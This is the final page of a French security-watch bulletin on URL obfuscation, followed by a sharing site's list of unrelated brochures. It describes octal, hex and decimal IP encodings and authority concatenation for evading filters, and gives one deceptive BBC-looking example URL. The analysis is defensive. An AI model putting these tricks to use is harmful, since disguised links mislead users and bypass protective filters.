X
4*8bits Octal
(0a.0b.0c.0d)
X
4*8bits Hexa
(0xa.0xb.0xc.0xd)
X
32bits Décimal (nnnnn)
X
32bits Octal
(0nnnn)
X
32bits Hexa
(0xnnnn)
X
Notons que la technique consistant à concaténer deux composantes ‘autority’ pour créer un relayage forcé – avec ou
sans changement de protocole - n’a pas été abordée. Son utilisation permet non seulement de complexifier l’analyse
de l’URL mais aussi de masquer l’origine d’une connexion ou encore de traverser certains filtres de protection.
Cette rapide étude montre les problèmes induits par l’absence d’un véritable processus de normalisation ne laissant
place ni à l’interprétation ni à la diffusion de produits non conformes. Elle démontre la difficulté de la mise en place
d’un mécanisme de filtrage uniquement basé sur des règles de comparaison en lieu et place d’une analyse syntaxique
utilisant une grammaire évolutive et adaptable à l’environnement.
Avec Proxy
http://news.bbc.co.uk!articles@3276960428/hi/english/uk/newsid/123456.htm
http://europe.thestandard.com/article/display/0,1151,16490,00.html
Page 45/45

Veille Technologique Sécurité

Transcription

Documents pareils

Inventaire du don, ici.

iMedia BTS 01.cdr

Easy One 5012a - Passion Packard Bell

iMedia 4700d no Disney.cdr

iMedia Noel 01.cdr

EasyOne Silver.cdr - Passion Packard Bell

Notre plaquette Informatique

EasyOne Silver Noel 01.cdr

La passerelle mobile vers Internet

iMedia mars 01.cdr - Passion Packard Bell